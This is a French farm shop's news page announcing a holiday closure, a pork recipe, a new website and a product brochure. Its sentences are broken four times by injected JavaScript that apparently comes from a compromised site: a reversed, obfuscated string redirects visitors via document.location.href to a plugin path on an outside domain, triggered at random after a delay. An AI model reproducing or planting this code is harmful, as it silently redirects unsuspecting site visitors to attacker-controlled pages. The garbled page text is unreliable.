Fermeture de la boutique

La boutique de la Ferme LALAQUE sera exceptionnellement fermée du 22 décembre 2018 au 7 janvier 2019. Bonnes fêtes à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous et rendez-vous à la rentrée !

Porc au caramel

Temps de préparation : 15 minutes Temps de cuisson : 40 minutes Ingrédients (pour 4 personnes) : 5 c à s de Nuoc man 1 grosse c à s de Sauce soja 4 c à s de sucre en poudre 3 gousses d’ail 1 oignon (rouge de préférence) 2 c à s d’huile 800g d’échines de porc …

Un nouveau site pour mieux vous servir !

Bienvenue sur le nouveau site de la ferme Lalaque ! Après 6 ans d’existence, le site de la ferme Lalaque fait peau neuve ! Retrouvez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les informations de notre ferme et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les produits disponibles à notre boutique. …

Nouvelle plaquette 2018 !

La nouvelle plaquette de la ferme Lalaque est sortie ! Retrouvez-la dans notre boutique ou bien téléchargez-la ici ! Retrouvez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous vos produits préférés mais aussi les nouveaux comme le jambon jambon cuit supérieur ou bien la saucisse au piment d’Espelette…